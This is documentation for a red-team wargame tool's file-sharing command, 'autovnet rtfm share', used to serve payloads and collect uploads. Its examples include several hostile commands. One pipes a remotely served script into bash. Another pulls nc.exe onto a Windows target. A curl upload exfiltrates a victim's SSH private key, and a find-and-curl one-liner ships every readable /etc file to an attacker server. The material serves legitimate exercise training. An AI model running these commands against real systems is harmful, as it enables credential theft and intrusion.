# Serving Files / Payloads

[TOC]


## Intro
One of the most common activities in Cyber Wargames is transferring files between systems.

A favorite technique is to use python's `http.server` to host files because it's so easy.

Unfortunately, it is HTTP only (no HTTPS), does not support file uploads (for exfil), and novice Red Teamers end up sharing their home directories or other secrets by accident.

We can do better.

The `autovnet rtfm share` command is your go-to solution for serving files via `http` or `https`.

The first time you run it will be slow, as it gets set up.

> Note: this kind of functionality is often called "Red Team CDN" by people who don't understand what a CDN is. It's a static file server.

### `share` defaults

Here, we run with no options:
```bash
$ autovnet rtfm share
[+] autovnet rtfm share guiltless_visit
[+] =======================================
[+] Sharing: /tmp/rtfm_share__kndcd27
[+] =======================================
[+] http://10.253.164.171
[+] =======================================
[+] https://10.229.230.11
[+] =======================================
Creating network "rtfm_share_32827_48424_default" with the default driver
Creating rtfm_share_32827_48424_file_server_1 ... done
Attaching to rtfm_share_32827_48424_file_server_1
file_server_1  | 2021/12/12 19:18:23 [+] Waiting for requests...
```
1. We can use `autovnet rtfm share guiltless_visit` later to re-provision this file server using the same remote IPs
2. `/tmp/rtfm_share__kndcd27` is a _temporary_ directory created by `autovnet` that is being served.
    - It starts empty, so you don't share anything you don't intend to
    - _copy_ files into this directory to share them, do not move them - **the directory will be deleted**
3. `http://10.253.164.171` (`:80`) and `https://10.229.230.11` (`:443`) both reach our file server
4. `[+] Waiting for requests...` is confirmation that the file server is ready

For fun, let's serve `nc.exe` for a Windows target to download:
```bash
$ cp /usr/share/windows-binaries/nc.exe /tmp/rtfm_share__kndcd27
```

On Windows target, in powershell
```powershell
iwr -UseBasicParsing http://10.253.164.171/nc.exe -OutFile nc.exe
```

And let's download [LinEnum.sh](https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) from the internet, then re-serve it to a Linux target

```bash
# Kali
$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
$ cp LinEnum.sh /tmp/rtfm_share__kndcd27
```

On Linux target
```bash
$ curl -k https://10.229.230.11/LinEnum.sh | bash
```

When you stop the `share` command, it will remind you that  your _temporary_ directory will be deleted, and give you one last chance to save any files in it before it's gone forever.

### `share` a directory

If you like persistent sharing or want to receive file uploads from target systems,
you can pass the `share` command a local directory to share.

If you do, this directory will _not_ be deleted when the command exits.

Here is an example for saving file uploads in a persistent directory:
```bash
$ mkdir -p ~/loot
$ autovnet rtfm share ~/loot
[+] autovnet rtfm share shaggy_weather
[+] =======================================
[+] Sharing: /home/kali/loot
[+] =======================================
[+] http://10.214.191.126
[+] =======================================
[+] https://10.197.77.223
[+] =======================================
Creating network "rtfm_share_47544_58066_default" with the default driver
Creating rtfm_share_47544_58066_file_server_1 ... done
Attaching to rtfm_share_47544_58066_file_server_1
file_server_1  | 2021/12/12 19:41:03 [+] Waiting for requests...
```

Then we can use any tool capable of multi-part form data file uploads to send files to our server.

In this example, we will use `curl` on a Linux target to exfiltrate a private ssh key:

```bash
$ curl -k -F.=@$HOME/.ssh/id_rsa https://10.197.77.223$HOME/.ssh/id_rsa
```

The running `share` command acknowledges the upload with:
```bash
file_server_1  | 2021/12/12 19:52:35 [*] Receiving 2.5 KB: /home/victim/.ssh/id_rsa -> /files/home/victim/.ssh/id_rsa
file_server_1  | 2021/12/12 19:52:35 [+] Uploaded 2.5 KB to /files/home/victim/.ssh/id_rsa
```

The server recreates the directory structure provided by the victim machine, and saved the file in the `~/loot` directory we used in the `autovnet rtfm share` command:

```bash
$ ls -alh ~/loot/home/victim/.ssh/id_rsa
-rw-r--r-- 1 kali kali 2.6K Dec 12 14:52 /home/kali/loot/home/victim/.ssh/id_rsa
```

There are a few caveats for uploads (e.g. the url has to be URL-encoded), and there are smarter ways to do this, but if you want to light up a network with exflitration,
it's pretty straightforward to throw together a oneliner:

```bash
# Try to grab every file in /etc that we can read
$ find /etc/ -type f -exec curl -k -F.=@{} https://10.197.77.223{} \;
```

This gets a lot of useful config files, etc., and nicely recreates the directory structure locally.
```bash
$ ls -alh ~/loot/etc/ssh
total 556K
drwxr-xr-x   2 kali kali 4.0K Dec 12 14:58 .
drwxr-xr-x 113 kali kali 4.0K Dec 12 14:58 ..
-rw-r--r--   1 kali kali 523K Dec 12 14:58 moduli
-rw-r--r--   1 kali kali 1.6K Dec 12 14:58 ssh_config
-rw-r--r--   1 kali kali 3.3K Dec 12 14:58 sshd_config
-rw-r--r--   1 kali kali  170 Dec 12 14:58 ssh_host_ecdsa_key.pub
-rw-r--r--   1 kali kali   90 Dec 12 14:58 ssh_host_ed25519_key.pub
-rw-r--r--   1 kali kali  562 Dec 12 14:58 ssh_host_rsa_key.pub
-rw-r--r--   1 kali kali  342 Dec 12 14:58 ssh_import_id
```

Note: for now, all of these files are also available for download, so if your Rules of Engagement (RoE) for Blue Team includes threat hunting,
they may connect to your server and learn exactly what information has been compromised.

If you don't want this, adjust the RoE or only serve loot directories for the minimum amount of time necessary.


### `share` a file

`autovnet` also makes it easy to share a single file.

Simply pass the path to the `share` command, it it will be staged in a temporary directory

```bash
$ autovnet rtfm share /usr/share/windows-binaries/nc.exe
[+] autovnet rtfm share nutritious_role
[+] =======================================
[+] Sharing: /tmp/rtfm_share___qw7kvr
   [*] staged   : /nc.exe ( /usr/share/windows-binaries/nc.exe )
   [*] download : autovnet rtfm download https://10.220.53.101/nc.exe
[+] =======================================
[+] http://10.208.110.182
[+] =======================================
[+] https://10.220.53.101
[+] =======================================
Creating network "rtfm_share_49407_33174_default" with the default driver
Creating rtfm_share_49407_33174_file_server_1 ... done
Attaching to rtfm_share_49407_33174_file_server_1
file_server_1  | 2021/12/12 20:05:26 [+] Waiting for requests...
```

It also generates a handy `download` command that other Red Teamers can use to easily download your file.

### sharing secrets

> Note: `autovnet rtfm fs export` is a superior solution for secure collaboration.
> The feature described here is useful when you need to distribute exactly 1, never changing file to multiple players.

Often, you have secret files you want to share between Red Teamers.

`autovnet` lets you securely encrypt a file before you share it so that only other Red Teamers with `autovnet` installed and the random password for that file can decrypt it.

If you have multiple files, you can just bundle them together with `tar -czf files.tar.gz my_directory/` first.

Here, we share a file named `secrets.txt`:

```bash
$ autovnet rtfm share -e /tmp/secrets.txt
[+] autovnet rtfm share resonant_deal
[+] =======================================
[+] Sharing: /tmp/rtfm_share_tb1u6ir1
[+] Password: Discreet-Scattered-Article
   [*] staged   : /secrets.txt ( /tmp/secrets.txt )
   [*] download : autovnet rtfm download --password Discreet-Scattered-Article https://10.254.100.5/secrets.txt
[+] =======================================
[+] http://10.223.225.176
[+] =======================================
[+] https://10.254.100.5
[+] =======================================
Creating network "rtfm_share_46724_61661_default" with the default driver
Creating rtfm_share_46724_61661_file_server_1 ... done
Attaching to rtfm_share_46724_61661_file_server_1
file_server_1  | 2021/12/12 20:11:14 [+] Waiting for requests...
```

The generated download command can be shared with Red Teamers out-of-band, and will download and decrypt the file.

```bash
$ autovnet rtfm download --password Discreet-Scattered-Article https://10.254.100.5/secrets.txt
$ cat secrets.txt
my secret
```

The encryption is used is very strong, so even with access to `autovnet`'s source code it's not feasible for anyone to crack in a reasonable amount of time.

> Note: anyone with the URL is able to download the file, but the password is required to decrypt it. Otherwise, it is an opaque, encrypted blob.

